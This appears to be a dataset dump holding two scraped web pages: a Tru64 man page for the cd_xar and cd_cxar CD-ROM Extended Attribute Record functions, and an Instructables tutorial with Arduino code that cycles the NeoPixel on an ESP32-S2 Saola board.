text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Content-type: text/html cd_xar, cd_cxar - Reads the Extended Attribute Record for a CD-ROM file or directory from the CD-ROM Rock Ridge and X/Open Extensions to the CDFS library (libcdrom.so, libcdrom.a) #include <sys/cdrom.h> int cd_xar ( char *path, int fsec, struct iso9660_xar *xar, int applen, int esclen ); int cd_cxar ( char *path, int fsec, char *addr, int xarlen ); The cd_xar routine fills the *xar structure with the contents of the Extended Attribute Record (XAR) that is associated with the file or directory pointed to by *path. The total number of logical blocks of an XAR can be obtained by calling the cd_drec function. The Logical Block Size in bytes can be obtained by calling the cd_pvd function. The length of the fixed part of the XAR is given by {CD_XARFIXL}. The variable {CD_XARFIXL} is defined in cdfs/xcdr.h, an include file that is called into sys/cdrom.h. The cd_cxar function copies the XAR as recorded on the CD-ROM to the address pointed to by *addr. If successful, the routines return the following values: The cd_xar function returns the number of bytes copied for the variable part of the XAR. The cd_cxar function returns the number of bytes copied. If unsuccessful, the integer -1 is returned and errno is set to indicate the error. The function will fail if: Search permission is denied for a directory in *path or read permission is denied for the file or directory pointed to by *path. The address of *path or *addr is invalid. A signal was caught during execution of the function. The argument *path points to a file or directory that is not within the CD-ROM file hierarchy. The value of fsec or xarlen is invalid. {OPEN_MAX} file descriptors are currently open in the calling process. Files: cdfs/xcdr.h, sys/cdrom.h. Functions: cd_drec(3) delim off
http://backdrift.org/man/tru64/man3/cd_cxar.3.html
CC-MAIN-2017-22
refinedweb
314
72.66
Assertion multiple objects for the same value Hi, Sometimes I get about 70 objects in my response. I want assert different values and it takes a lot of time to do it for all if I have to do it separately. I'm looking for a faster way to assert but I can't find the option in ReadyAPI. Maybe with a (groovy) script it's possible but I am not familiar with scripting. Assertion for count "Employee": -Count for value "Employee". If I choose assertion for count I can assert count for "role" and not for "Employee". Expected result for count "Employee" must be 3. Example response: [ { "id" : "00123456789", "name" : "Mike", "role" : "Employee", "city" : "New York" }, { "id" : "00123456711", "name" : "Jack", "role" : "Employee", "city" : "Arizona" }, { "id" : "00123456799", "name" : "Bruce", "role" : "Employee", "city" : "Houston" }, { "id" : "00123456766", "name" : "wilma", "role" : "Owner", "city" : "Texas" } ] Solved! Go to Solution. The Message Content Assertion might help as allows you to specify if values are > or < or = a certain value for all the attributes in your payload, however asserting on multiple attributes is always a bit lengthy and tedious. You can use groovy to help like with your example, but only if the same values are repeated throughout your payload Ta Rich @jsontester : You can refer below code and implement the logic according to your need import groovy.json.JsonSlurper def response = testRunner.testCase.getTestStepByName("TEST__STEP__NAME").getPropertyValue("Response") slurperRes = new JsonSlurper().parseText(response) def val = slurperRes.PATH__TO__Array int countEmp = 0 int countOwner = 0 for(int i = 0 ; i < val.size() ; i++){ if(val[i].role == "Employee"){ countEmp = countEmp+1 } else if(val[i].role == "Owner"){ countOwner = countOwner + 1 } } assert countEmp == 3 : "Employee count is not 3" What i have understood i have implemented. Please let me know in case you need more help Click "Accept as Solution" if my answer has helped, Remember to give "Kudos" 🙂 ↓↓↓↓↓ Thanks and Regards, Himanshu Tayal
https://community.smartbear.com/t5/ReadyAPI-Questions/Assertion-multiple-objects-for-the-same-value/m-p/212958/highlight/true
CC-MAIN-2022-40
refinedweb
315
64.3
i'm trying to come up with an add method for a generic class i created. generally the object i create will be arrays, of type integer double or string. i dont know how to go about making the add method to have stuff added to the array... heres my code so far... /** The MyList class holds X and Y coordinates. The data type of the coordinates is generic. */ public class MyList<T extends Number> { private T xCoordinate; // The X coordinate private T yCoordinate; // The Y coordinate /** Constructor @param x The X coordinate. @param y The Y coordinate. */ public MyList(T x, T y) { xCoordinate = x; yCoordinate = y; } /** The setX method sets the X coordinate. @param x The value for the X coordinate. */ //INSERT INFO HERE //PLEASE HELP!!! public void add(T[] array, int i) { int[] newArray = new int[array.length]; System.arraycopy(array, 0, newArray, 0, array.length); newArray[newArray.length - 1] = i; return newArray; } } I keep getting a compiler error... with this code above does it meet the requirements of my assignment: ASSIGNMENT: Write a generic class named MyList, with a type parameter T. The type parameter T should be constrained to an upper bound: the Number class. The class should have as a field an ArrayList of T. Write a public method named add, which accepts a parameter of type T. When an argument is passed to the method, it is added to the ArrayList.
https://www.daniweb.com/programming/software-development/threads/260664/add-method-for-arraylists
CC-MAIN-2017-09
refinedweb
238
67.86
Message-ID: <120880946.8615.1418895458281.JavaMail.haus-conf@codehaus02.managed.contegix.com> Subject: Exported From Confluence MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_Part_8614_1748966326.1418895458280" ------=_Part_8614_1748966326.1418895458280 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Location: Provide a builder/slurper combination for handling data in JSON format i= n a similar fashion as it's already done for XML.=20 JSON has become ubiquitous to the web. RESTful services exchange data in= both POX (Plain Old XML) and JSON formats. Groovy has excellent support fo= r producing/consuming XML with MarkupBuilder, XmlSlurper= and XmlParser but lacks this kind support for JSON. Th= is GEP strives to remedy the situation, by providing a compatible builder a= pproach. The following builder syntax is proposed=20 def builder =3D new groovy.json.JsonBuilder() def root =3D builder.people { person { firstName 'Guillame' lastName 'Laforge' // Maps are valid values for objects too address( city: 'Paris', country: 'France', zip: 12345, ) married true conferences 'JavaOne', 'Gr8conf' } } // creates a data structure made of maps (Json object) and lists (Json arra= y) assert root instanceof Map println builder.toString() // prints (without formatting) {"people": { "person": { "firstName": "Guillaume", "lastName": "Laforge", "address": { "city": "Paris", "country": "France", "zip": 12345 }, "married": true, "conferences": [=20 "JavaOne", "Gr8conf" ] } }=20 Valid node values are: Number, String, G= String, Boolean, Map, List. <= code>null is reserved for object references. Arrays can not be null = but they can be empty. Anything else results in an IAE (or a more specializ= ed exception) being thrown. There is a special case to be considered: when the top node results in a= n anonymous object or array. For objects a call() method on th= e builder is needed which takes a map as argument, for arrays call()<= /code> takes a vararg of values. Here are some examples: builder.foo "foo" // produces {foo: "foo"} builder([{ foo 'foo' }]) // produces [{"foo": "foo"}] builder([[ foo: 'foo' ]]) // produces, same as above [{"foo": "foo"}] builder { elem 1, 2, 3 } // produces { "elem": [1, 2, 3] }=20 When a method is called on the builder without arguments, and empty JSON= object is associated with the key:=20 builder.element() // produces { "element": {} }=20 You can also pass a map and a closure argument:=20 builder.person(name: "Guillaume", age: 33) { town "Paris&quo= t; } // produces {"name": "Guillaume", "age": 33, "town&q= uot;: "Paris}=20 Calls like the following, with a map and a value, don't have any meaning= ful representation in JSON (unlike in XML), and triggers a JsonException:= p>=20 shouldFail(JsonException) { builder.elem(a: 1, b: 2, "some text value") }=20 In case of overlapping keys in the map and the closure, the closure wins= =E2=80=93 a visual clue for this rule is that the closure appears "af= ter" the map key/value pairs.=20 The proposal is for the creation of a JsonSlurper class that can read JS= ON from a string (in a non-streaming fashion) and produce a hierarchy of ma= ps and lists representing the JSON objects and arrays respectively.=20 String json =3D '{"person": {"firstName": "Guillau= me", "lastName": "Laforge", "conferences"= ;: ["JavaOne", "Gr8conf"]}}' def root =3D new JsonSlurper().parseText(json) assert root instanceof Map assert root.person.conferences instanceof List assert root.person.firtsName =3D=3D 'Guillaume' assert root.person.conferences[1] =3D=3D 'Gr8conf'=20 JsonSlurper's API should mirror closely what XmlParser/XmlSlurper offers= in terms of its parse* method variants.=20 Built-in JSON support in Groovy 1.8= =20
http://docs.codehaus.org/exportword?pageId=184385558
CC-MAIN-2014-52
refinedweb
578
53.1
This post is branched from my earlier posts on designing a question-question similarity system. In the first of those posts, I discussed the importance of speed of retrieval of most similar questions from the training data, given a question asked by a user in an online system. We designed few strategies, such as the HashMap based retrieval mechanism. The HashMap based retrieval assumes that at-least one word between the most similar questions and the asked question is same. In most practical situations, 95% of the time, this will suffice, but there could be 5% cases where either the question being asked has completely new vocabulary (more probable) or none of the words in the asked question and the most similar questions are same (less probable). Note : "similar" doesn't mean that a pair of questions has to have at-least one word common. For e.g. the pair of questions : "What is the minimum age to buy a gun ?" and "How old do I need to be to obtain a weapon ?". Ignoring the stop-words, none of the other words are same in both the questions. In this post, we look at an alternative to linear scanning (note that, we do not scan all questions, we scan only the questions represented by the cluster heads). It's quite obvious that if there are N questions of feature size D, then a linear scan over them would take O(N*D) time and space complexity. The idea of KD-Tree is to construct a tree out of the questions, in such a way that will reduce the time complexity of searching an exact match or nearest matching questions. For e.g., given N points in a 1-D space, then if the points are sorted, searching for a point (if it exists or not) takes O(logN) time complexity using plain binary search. Searching for the nearest point to a reference point is also O(logN) as we show below. A python implementation to find the nearest element given a reference point (assuming points are sorted in 1-D space) : def get_nearest(arr, ref): left, right = 0, len(arr) - 1 while left <= right: mid = int((left + right) / 2) if arr[mid] > ref: right = mid - 1 else: left = mid + 1 if left > 0 and abs(arr[left - 1] - ref) < abs(arr[left] - ref): return arr[left - 1] else: return arr[left] The code searches for the interval in the array, in which our reference point lies, and then returns either the left or the right side value of the interval depending on which one is more closer to our reference point. The case for 1-D was quite simple. Now consider points in 2-D. The idea is to first divide the points in two parts along the x-axis (points which lie to the left and points which lie to the right of x-axis). Then for each left and right side, split the points further into two parts but this time along the y-axis. Thus now each left and right parts are further split into up and down sub-parts. Repeat the process in round-robin fashion until no further splitting is possible. KD Tree splitting in 2 dimensions (Source : research-gate) The split-point is chosen to be the point having the median value along the split-axis. Once the tree is constructed, searching for an exact point in the tree takes O(D*log(N)) time complexity. Why ? If the root is the reference point, then we are done (in O(D) time), else check with the value along the split axis for the root, i.e. the x-axis. If the value along the x-axis of the reference point is less than equal to the split value at the root then search in left sub-tree else search in the right sub-tree. For e.g. to search for (60, 80) in the below tree, one would compare 60 with 51 (x-axis value of root) and then decide that 60 > 51 and we should go to right sub-tree. Then compare 80 with 70 (the y-axis value of the root at right sub-tree) and decide that 80 > 70 and thus again go right and so on. KD-Tree constructed out of 2D points. Note that by round-robin splitting we are trying to ensure that the tree is balanced as much as possible. Thus with N points, the maximum height is O(logN). Since at each level of the tree we search at-most one point and each point is D (=2) dimensional, thus the time complexity for exact search is O(D*log(N)). But round-robin splitting may not always be optimal (what if all the points or most points lie along the x-axis ?) Searching the nearest point is a bit tricky in higher than 1-D space. Let's traverse the tree as we would do in the case of exact search. For example, if our reference point is (50, 2) (shown in green below), then by traversing the tree we would land up at the bounding box with (10, 30) on the left boundary and (25, 40) on the top boundary. Now is it true that either of (10, 30) or (25, 40) is the closest point to (50, 2) ? No, because the closes point is (55, 1) which is inside the bounding box to the right. That means we simply cannot traverse the tree in one of left or right direction in each step to get to the solution as in the case of exact search. Bounding Box To solve this problem, we need to know, whether we must search only one side of a sub-tree or both the sides. But how to know that ? Since we reached our destination by traversing last through (10, 30), we compute the (euclidean) distance of (50, 2) from (10, 30), which is 48.83. This distance becomes the radius of a sphere centered at our ref.point. Now, if this sphere cuts through the plane of the split axis (x=10), then we also need to scan the left side of the plane because some region on the left side of the plane can come inside this sphere. Which is true since the perpendicular distance of the ref. point from the plane x=10 is 40 < 48.83, implying that this sphere cuts through the x=10 plane. Fortunately (1, 10) is at a distance of 49.65, which is greater than 48.83 and thus our best guess still remains (10, 30). Once we have looked into all possible branches of a sub-tree, we start to backtrack up the tree. (25, 40) is split on the y-axis (y=40). Since the perpendicular distance from y=40 to (50, 2) is 38 < 48.83 (the radius of the smallest sphere seen so far), it implies that the sphere cuts through this plane too and we need to scan the other side of y=40 also. Repeating the same for the right sub-tree of (25, 40), we find that the point (50, 50) is closer i.e. distance=48 < 48.83. Thus our new solution becomes (50, 50). Once we are done checking the left and right sub-tree of (25, 40), we check the distance of the ref. point with the root (25, 40) itself. And it is 45.49 < 48. Thus (25, 40) is our current best solution. Next up (51, 75) is split on the x-axis by the x=51 plane. Perpendicular distance of (50, 2) from x=51 plane is 1 which is less than 45.49 (radius of smallest sphere seen till now). Thus we need to scan the right sub-tree rooted at (51, 75). Repeat the above process and we eventually find the true closest point (55, 1). Note that by the time we discover our solution (55, 1), we have scanned each and every point in the tree. Thus nearest neighbor search in a KD-Tree has the worst case complexity of O(N*D), similar to linear scan. If the reference point had been say (12, 33), then we need not have gone towards the right sub-tree of (25, 40) or right sub-tree of (51, 75), because the radius of sphere from (10, 30) is 3.6, which is less than the perpendicular distances of (12, 33) from y=40 (7) and x=51 (39). Here is a small animation taken from wikipedia explaining how we go about searching the tree : Nearest Neighbor Search Time to code up !!! Instead of going by the traditional approach of using recursive functions to build and call the tree (as defined in many articles and tutorials), we will take an iterative approach, because recursion will throw error when the depth of the tree increases beyond maximum recursion depth. Although the depth increases by order of O(logN) only, still we did not want to take any chances. For iterative solution, we will use a Queue based approach, that builds the tree level-wise. import numpy as np import time, math, heapq from collections import deque """ Class for defining all variables that goes into the queue while constructing the KD Tree """ class QueueObj(object): def __init__(self, indices, depth, node, left, right): self.indices, self.depth, self.node = indices, depth, node self.left, self.right = left, right """ Class for defining the node properties for the KD Tree """ class Node(object): def __init__(self, vector, split_value, split_row_index): self.vector, self.split_value, self.split_row_index = vector, split_value, split_row_index self.left, self.right = None, None """ KD Tree class starts here """ class KDTree(object): def __init__(self, vectors): self.vectors = vectors self.root = None self.vector_dim = vectors.shape[1] def construct(self): n = self.vectors.shape[0] queue = deque([QueueObj(range(n), 0, None, 0, 0)]) while len(queue) > 0: qob = queue.popleft() q_front, depth, parent, l, r = qob.indices, qob.depth, qob.node, qob.left, qob.right axis = depth % self.vector_dim vectors = np.argsort(self.vectors[q_front, :][:, axis]) vectors = [q_front[vec] for vec in vectors] m = len(vectors) median_index = int(m / 2) split_value = self.vectors[vectors[median_index]][axis] left, right = median_index + 1, m - 1 while left <= right: mid = int((left + right) / 2) if self.vectors[vectors[mid]][axis] > split_value: right = mid - 1 else: left = mid + 1 median_index = left - 1 node = Node(self.vectors[vectors[median_index]], split_value, vectors[median_index]) if parent is None: self.root = node else: if l == 1: parent.left = node else: parent.right = node if median_index > 0: queueObj = QueueObj(vectors[:median_index], depth + 1, node, 1, 0) queue.append(queueObj) if median_index < m - 1: queueObj = QueueObj(vectors[median_index + 1:], depth + 1, node, 0, 1) queue.append(queueObj) Each node stores the row vector that was used to decide split, the split value of the axis, the row in the original matrix that corresponds to this vector and the left and right sub-tree pointers. Run-time Analysis : If we had written the above code using recursion, then our time complexity would have been given as : T(n) = 2T(n/2) + cn*log(n), because at each level of the tree we are sorting the rows passed to the current node from its parent node and then further splitting into two equal parts. The above recurrence relation can be solved as the following : T(n) = O(n*log2(n)) One can theoretically solve it in O(n*log(n)) by pre-sorting the matrix and then tracking which rows went where, but the code becomes a bit complicated. Moreover, the tree construction phase is an offline process, so a factor of log(n) vs. log2(n) doesn't really effect the overall latency. We are choosing the median as the split value. Note that multiple rows for the split axis can have the same median value, and in that case, we choose to keep all rows having less than equal to median value to the left sub-tree. This is taken care by the small piece of code using binary search to find the last row with the same median value in the sorted array. left, right = median_index + 1, m - 1 while left <= right: mid = int((left + right) / 2) if self.vectors[vectors[mid]][axis] > split_value: right = mid - 1 else: left = mid + 1 median_index = left - 1 Construct the tree by calling the below function : tree = KDTree(arr) tree.construct() Choosing the split axis in a round-robin manner is not the only way. Other more optimum technique would be to choose the axis for which the difference between the value after the median and the value before the median is greatest. Can you guess why this is a better strategy ? Following is the code for performing exact search on the above KD Tree : def search(self, vector): node = self.root depth = 0 while node is not None: if np.array_equal(node.vector, vector): return True axis = depth % self.vector_dim if vector[axis] <= node.split_value: node = node.left else: node = node.right depth += 1 return False The above function is as simple as doing a search on a binary tree. In our question similarity case, the requirement is to find the nearest K questions given a customer question or questions within a specific radius only. The single closest point is a special case of this one. So we have written the function for nearest neighbor keeping in mind the generic case of K nearest neighbors. The below function can be easily modified to handle distance threshold based nearest neighbors. We are using a Max Heap data structure to store the smallest K distances discovered so far in the tree and continue updating the heap. Note that when we have to decide whether we should scan both the sub-trees, we use the root of the max heap (maximum distance among the smallest K distances) as the radius of the sphere to decide whether the split plane cuts through this sphere or not, because there could be some point which is at a distance less than the root of the max heap but greater than the children of the root. def insert_distance_into_heap(self, distances, node, node_distance, k): if len(distances) == k and -distances[0][0] > node_distance: heapq.heappop(distances) if len(distances) < k: heapq.heappush(distances, (-node_distance, node.split_row_index)) def nearest_neighbor(self, vector, k): search_stack = [(self.root, 0)] distances, visited = [], set() while len(search_stack) > 0: node, depth = search_stack[-1] axis = depth % self.vector_dim child_node = None if vector[axis] <= node.split_value: if node.left is None or node.left.split_row_index in visited: node_distance = math.sqrt(np.sum((node.vector - vector) ** 2)) if node.right is None or node.right.split_row_index in visited: self.insert_distance_into_heap(distances, node, node_distance, k) else: w = node_distance if len(distances) == 0 else - distances[0][0] if node.split_value - vector[axis] <= w: child_node = node.right else: child_node = node.left else: if node.right is None or node.right.split_row_index in visited: node_distance = math.sqrt(np.sum((node.vector - vector) ** 2)) if node.left is None or node.left.split_row_index in visited: self.insert_distance_into_heap(distances, node, node_distance, k) else: w = node_distance if len(distances) == 0 else - distances[0][0] if vector[axis] - node.split_value <= w: child_node = node.left else: child_node = node.right if child_node is None or child_node.split_row_index in visited: visited.add(node.split_row_index) search_stack.pop() else: search_stack.append((child_node, depth + 1)) distances = [(-x, y) for x, y in distances] distances = sorted(distances, key=lambda k: k[0]) return distances Again instead of recursion, we are using an iterative method for finding the K nearest neighbors. But instead of a Queue, we are using a Stack data structure, since we are going depth-wise and not level-wise. Also note that we are keeping a variable "visited" to track all those nodes for which we have completed scanning the root node as well as the left and right sub-trees of that node. The first level of if..else condition is same as that of the exact search method, where we go to left sub-tree if the value along the split axis for the ref. point is less than equals to the split value of the node else we go right. But then for each node we check whether the node has already been "visited" or is it a leaf node. If either of them is true then we insert the distance from the node to the ref. point into our max heap, else we go either to the other side of the sub-tree (sphere cutting the splitting plane) or backtrack upwards. To improve the search speed, instead of using the split plane, one can also use the plane along the same axis but passing through the nearest points along each side of the split plane (support planes). To use this method, we need to save the nearest points from the split plane on both sides with the node properties. nearest planes to the split plane along the x-axis (shown in dotted lines) class Node(object): def __init__(self, vector, split_value, split_row_index, left_nearest, right_nearest): self.vector, self.split_value, self.split_row_index = vector, split_value, split_row_index self.left_nearest, self.right_nearest = left_nearest, right_nearest self.left, self.right = None, None Add the following in 'construct' method of the KDTree class : a, b = max(0, int(m/ 2) - 1), min(m - 1, median_index + 1) left_nearest, right_nearest = self.vectors[vectors[a]][axis], self.vectors[vectors[b]][axis] node = Node(self.vectors[vectors[median_index]], split_value, vectors[median_index], left_nearest, right_nearest) And modify the 'nearest_neighbor' function as follows : #For scanning right sub-tree if node.right_nearest - vector[axis] <= w: child_node = node.right #For scanning left sub-tree if vector[axis] - node.left_nearest <= w: child_node = node.left To modify the above code to handle threshold based distance metric, we just have to modify the function "insert_distance_into_heap" to insert into a list instead of a heap based on some threshold. Performance Analysis : Although exact search on the KD Tree is very fast as compared to linear search but the nearest neighbor search performance is rather poor. From several experiments the run time of nearest neighbor search is at par with the linear scan method. From a visual analysis perspective, only if the points in the KD Tree are well spaced out in the D-dimensional hyperspace, only then we gain some advantage over linear scan, else in most cases we need to search at-most O(N) nodes. In a way it is similar to clustering. Clustering is good only when the intra-cluster distances are much smaller than the inter-cluster distance. Categories: MACHINE LEARNING, PROBLEM SOLVING Tags: K Nearest Neighbors, KD Tree, Nearest Neighbor, Question Similarity, Queue, Stack
http://www.stokastik.in/using-kd-tree-for-nearest-neighbor-search/
CC-MAIN-2018-47
refinedweb
3,120
71.85
I will explain in this article how to reverse a given string in a Windows console application using C# without using a function. This type of question might be asked by an interviewer in a .Net position related interview. And use the following code in the program.cs class file: In the above program I have clearly explained in comments which statement is used for which purpose. Now run the program with the input string vithal wadje; the output will be as follows: My intent for this article is to explain how to answer a question that is often asked in an interview, which is: Write a program to reverse the given String without using the string function. A candidate new to the interview can become totally confused because the first problem is the candidate just thinks about functions, not other techniques to reverse a string. String ? A String is a sequence of characters enclosed within double quotation marks. Example "vithal wadje" , "C#" , "Mumbai" "Five hundred" etc. I hope you understand about strings now. What reversing String Means ? To change the position of charters from right to left one by one is called reversing a string. Example Suppose I have the given input as: vithal wadje Then the given string can be reversed into: ejdaw lahtiv Now that we completely understand what is meant by reversing a string, next I will explain how to do it step-by-step, as in the following: - Open Visual Studio from Start - - All programs -- Microsoft Visual Studio. - Then go to to "File" -> "New" -> "Project..." then select Visual C# -> Windows -> Console application. - After that specify the name such as ReverseString or whatever name you wish and the location of the project and click on the OK button. The new project is created. using System; namespace ReverseString { class Program { static void Main(string[] args) { string Str, Revstr = ""; //for storing string value int Length; //for counting lenght of given string Console.Write("Enter A String : "); //showing message to user Str = Console.ReadLine(); //to allow user to input string Length = Str.Length - 1; //storing the length of given string while (Length >= 0) //loops the given string length { Revstr = Revstr + Str[Length]; //performimg a reverse string according to length of given string Length--; } Console.WriteLine("Reverse String Is {0}", Revstr); // displaying output to user Console.ReadLine(); // to keep window } } } Summary From the all examples above I have explained how to reverse the string. I hope this article is useful for beginners and anyone preparing for an interview. If you have any suggestions and feedback please contact me.
http://www.compilemode.com/2015/05/reverse-string-without-using-function-in-C-Sharp.html
CC-MAIN-2019-26
refinedweb
428
63.09
Lambda Tips @WIP Taking advantage of a running Lambda function and it’s state under the section Lambda function has a nice “trick” of setting above the class app = None then later on it will see if that is set def lambda_handler(event, context): global app # Initialize app if it doesn't yet exist if app is None: print("Loading config and creating new MyApp...") config = load_config(full_config_path) app = MyApp(config) return "MyApp config is " + str(app.get_config()._sections) If it is set it will not try to set it again but take advantage of the state and use it. Keep Warm You can set a bunch of schedulers and your Lambda function can check for the context of the request. If it is a scheduler event then just reply OK otherwise it should do what it normally would do. import boto3 from config import Config class KeepAwake: def __init__(self): """ keey awake """ self.config = Config() self.region = self.config.region self.app_env = self.config.app_env self.client = boto3.client('lambda', region_name=self.region) self.functions = [ "foo", "bar", ] def run(self): """ interate over lambda functions """ for lam in self.functions: print("Invoking ", lam) self.client.invoke( FunctionName=lam, InvocationType="Event" ) print("Invoked ", lam) Is another way to look around and call those functions.
https://alfrednutile.info/posts/264/
CC-MAIN-2021-17
refinedweb
213
53
String is a sequence of characters. But, many other languages that implement strings as character arrays, Java implements strings as objects of type String. Implementing strings as built-in objects allows Java to provide a full complement of features that make string handling convenient. The Java platform provides the String class to create and manipulate strings. Direct way to create a string is to write – String greeting = "Hello world!"; Whenever it encounters a string literal in your code, the compiler creates a String object with its value in this case, "Hello world!'. As with any other object, you can be create String object by using the new keyword and a constructor. The String class has 11 constructors that allow you to provide the initial value of the string using different sources, such as an array of characters. Example public class StringDemo { public static void main(String args[]) { char[] helloArray = { 'h', 'e', 'l', 'l', 'o', '.' }; String helloString = new String(helloArray); System.out.println( helloString ); } } This will produce the following result − Output hello. The length of a string is the number of characters in which it is included. To achieve this value, call the length () method. int length( ) The following fragment prints "3"?, since there are three characters in the string s: char chars[] = { 'a', 'b', 'c' }; String s = new String(chars); System.out.println(s.length()); This program is an example of length(), method String class. Example public class StringExample { public static void main(String args[]) { String palindrome = "Dot saw I was Tod"; int len = palindrome.length(); System.out.println( "String Length is : " + len ); } } This will produce following result − Output String Length is : 17 The String class is includes a method for concatenating two strings – string1.concat(string2); This returns a new string that is string1 with string2 added to it at the end. You can also use the concat() method with string literals, as in − "My name is ".concat("Zara"); Strings are more commonly concatenated with the + operator, as in − "Hello," + " world" + "!" which results in − "Hello, world!" Let's consider following example − public class StringDemo { public static void main(String args[]) { String string1 = "saw I was "; System.out.println("Dot " + string1 + "Tod"); } } This will produce the following result − Output Dot saw I was Tod − System.out.printf("The value of the float variable is " + "%f, while the value of the integer " + "variable is %d, and the string " + "is %s", floatVar, intVar, stringVar); You can write − String fs; fs = String.format("The value of the float variable is " + "%f, while the value of the integer " + "variable is %d, and the string " + "is %s", floatVar, intVar, stringVar); System.out.println(fs); Here is the list of methods supported by String class −.
https://chercher.tech/java-programming/strings
CC-MAIN-2019-18
refinedweb
449
64.2
What is an Array of String? The string is a collection of characters, an array of a string is an array of arrays of characters. Each string is terminated with a null character. An array of a string is one of the most common applications of two-dimensional arrays. scanf( ) is the input function with %s format specifier to read a string as input from the terminal. But the drawback is it terminates as soon as it encounters the space. To avoid this gets( ) function which can read any number of strings including white spaces. Sting is an array of characters terminated with the special character known as the null character (“\0”). Syntax datatype name_of_the_array[size_of_elements_in_array]; char str_name[size]; Example datatype name_of_the_array [ ] = { Elements of array }; char str_name[8] = “Strings”; Str_name is the string name and the size defines the length of the string (number of characters). A String can be defined as a one-dimensional array of characters, so an array of strings is two –dimensional array of characters. 4.5 (3,135 ratings) View Course Syntax char str_name[size][max]; Syntax char str_arr[2][6] = { {‘g’,’o’,’u’,’r’,’i’,’\0’}, {‘r’,’ a’,’ m’,’\0’}}; Alternatively, we can even declare it as Syntax char str_arr[2][6] ={“gouri”, ”ram”}; From the given syntax there are two subscripts first one is for how many strings to declare and the second is to define the maximum length of characters that each string can store including the null character. C concept already explains that each character takes 1 byte of data while allocating memory, the above example of syntax occupies 2 * 6 =12 bytes of memory. Example char str_name[8] = {‘s’,’t’,’r’,’i’,’n’,’g’,’s’,’\0’}; By the rule of initialization of array, the above declaration can be written as char str_name[] = “Strings”; 0 1 2 3 4 5 6 7 Index Variables 2000 2001 2002 2003 2004 2005 2006 2007 Address This is a representation of how strings are allocated in memory for the above-declared string in C. Each character in the string is having an index and address allocated to each character in the string. In the above representation, the null character (“\0”) is automatically placed by the C compiler at the end of every string when it initializes the above-declared array. Usually, strings are declared using double quotes as per the rules of strings initialization and when the compiler encounters double quotes it automatically appends null character at the end of the string. From the above example as we know that the name of the array points to the 0th index and address 2000 as we already know the indexing of an array starts from 0. Therefore, str_name + 0 points to the character “s” str_name + 1 points to the character “t” As the above example is for one-dimensional array so the pointer points to each character of the string. Examples of Array String in C #include <stdio.h> int main() { char name[10]; printf("Enter the name: "); fgets(name, sizeof(name), stdin); printf("Name is : "); puts(name); return 0; } Now for two-dimensional arrays, we have the following syntax and memory allocation. For this, we can take it as row and column representation (table format). char str_name[size][max]; In this table representation, each row (first subscript) defines as the number of strings to be stored and column (second subscript) defines the maximum length of the strings. char str_arr[2][6] = { {‘g’,’o’,’u’,’r’,’i’,’\0’}, {‘r’,’ a’,’ m’,’\0’}}; Alternatively, we can even declare it as Syntax: char str_arr[2][8] ={“gouri”, ”ram”}; From the above example as we know that the name of the array points to the 0th string. Therefore, str_name + 0 points to 0th string “gouri” str_name + 1 points to 1st string “ram” As the above example is for two-dimensional arrays so the pointer points to each string of the array. #include <stdio.h> int main() { int i; char name[2][8] = { “gouri”, “ram” }; for (i = 0; i < 2; i++) { printf(“String = %s \n”, name + i, name + i); } return 0; } Output: Functions of strings strcpy(s1,s2); this function copies string s2 innto sting s1. char s1[10] = “gouri”; char s2 [10] = “ram”; char s3 [10] ; strcpy(s3,s2); result => strcpy(s3,s2) : ram strcat(s1,s2); this function concatenates strings s1 and s2 , string s2 is appended at the end of the string s1. char s1[10] = “gouri”; char s2 [10] = “ram”; strcat(s1,s2); result => strcat(s1,s2) : gouriram strlen(s1); this function returns the length of the string s1. char s1[10] = “gouri”; strlen(s1); result => 5 strcmp(s1,s2); This function compares both strings s1 and s2. strchr(s1, ch); these functions find the first occurrence of the given character ch in the string s1 and the pointer points to this character in the string. strstr(s1,s2); this finds the first occurrence of string s2 in the string s1 and the pointer points to the string s2 in the string s1. With some invalid operations are str_arr[0] = “gouri”; in this operation pointer of the string is assigned to the constant pointer which is invalid and is not possible, because the name of the array is a constant pointer. To avoid this we can assign str_arr by using strcpy(str_arr[0],”gouri”). Conclusion An array itself defines as a list of strings. From the above introduction, we can conclude that declaration and initialization of strings are different as we saw for every string the compiler appends null character when it reads the string as input. There are many string handling functions a few functions with examples are explained above. Therefore arrays of the string are as easy as arrays. Recommended Articles This is a guide to a Strings Array in C. Here we discuss the basics of the Array Strings, Example of Array String in C and Functions of strings. You can also go through our other suggested articles to learn more–
https://www.educba.com/strings-array-in-c/
CC-MAIN-2020-16
refinedweb
999
56.08
Introduction: ESP32-S2 Saola Making the RGB Work I could not find any example code on how to access the Neo Pixel on my new ESP32-S2 so I decided to write some and share for anyone else who would like to do the same. Step 1: Here Is Some Code to Get Your NeoPixel on Your ESP32-S2 Cycling. First you need the ESP32 S2 devices installed in your Arduino IDE, downloaded here:... You will need the NeoPixel Library from Adafruit to get this sketch to work. Finally just run the code attached. // //Sample code to control the single NeoPixel on the ESP32-S2 Saola // #include <Adafruit_NeoPixel.h> // On the ESP32S2 SAOLA GPIO is the NeoPixel. #define PIN 18 //Single NeoPixel Adafruit_NeoPixel pixels(1, PIN, NEO_GRB + NEO_KHZ800); #define DELAYVAL 25 // Time (in milliseconds) to pause between color change void setup() { //This pixel is just way to bright, lower it to 10 so it does not hurt to look at. pixels.setBrightness(10); pixels.begin(); // INITIALIZE NeoPixel (REQUIRED) } // Simple function to return a color in the rainbow // Input a value 0 to 255 to get a color value. uint32_t Wheel(byte WheelPos) { //Assume the wheel value is less than 85, if so Green value is 0 uint32_t returnColor = Adafruit_NeoPixel::Color((byte)(255 - (WheelPos * 3)), 0, (byte)(WheelPos * 3)); //If we are greater than 170 Red value is 0 if (WheelPos > 84 && WheelPos < 170) { WheelPos -= 85; returnColor = Adafruit_NeoPixel::Color(0, (byte)(WheelPos * 3), (byte)(255 - WheelPos * 3)); } //Finally above 170 and Blue value is 0 else if (WheelPos >= 170) { WheelPos -= 170; returnColor = Adafruit_NeoPixel::Color((byte)(WheelPos * 3), (byte)(255 - WheelPos * 3), 0); } return returnColor; } //Counter to run from 0-255 to cycle the colors of the rainbow. int colorCount = 0; void loop() { //Set the new color on the pixel. pixels.setPixelColor(0, Wheel(colorCount++)); // Send the updated pixel colors to the hardware. pixels.show(); //Cycle the colors at the end. if (colorCount > 255) colorCount = 0; // Pause before next pass through loop delay(DELAYVAL); } 